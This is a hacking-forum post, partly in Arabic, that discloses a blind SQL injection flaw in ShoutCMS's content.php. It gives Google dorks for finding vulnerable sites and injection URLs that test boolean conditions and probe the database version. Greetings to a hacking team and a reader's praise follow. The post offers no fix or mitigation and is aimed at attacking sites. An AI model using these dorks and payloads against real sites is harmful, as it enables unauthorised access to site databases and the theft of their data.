ShoutCMS (content.php) Blind Sql Injection Vulnerability

[AtT4CKxT3rR0r1ST]

ShoutCMS (content.php) Blind Sql Injection Vulnerability

كود:

 
#################################################################### 
.:. Author         : Zero Cold [[email protected]] 
 
.:. Team           : Sec Attack Team 
 
.:. Home           : www.sec-attack.com/vb 
 
.:. Script         : Shout! Script 
 
.:. Vendor         : http://www.mediashaker.com/index.php 
 
.:. Bug Type       : Blind Sql Injection 
 
.:. Dork           : [1] "Powered by Shout!" 
                     [2] intitle:"Shout" inurl:"admindex.php" 
 
#################################################################### 
 
===[ Exploit ]=== 
 
www.site.com/content.php?id=54+and+1=1       >>> True 
www.site.com/content.php?id=54+and+1=2       >>> False 
 
 
www.site.com/content.php?id=54+and substring(@@version,1,1)=4  >>> True 
www.site.com/content.php?id=54+and substring(@@version,1,1)=5  >>> False 
 
 
 
#################################################################### 
 
Greats T0: HackxBack & AtT4CKxT3rR0r1ST & SAD All My Friend & All Member Sec Attack

[هاوي حنانك]

مجهووود راااائع ومميز مشكووووور وما قصرت

دمت في تألق وابداع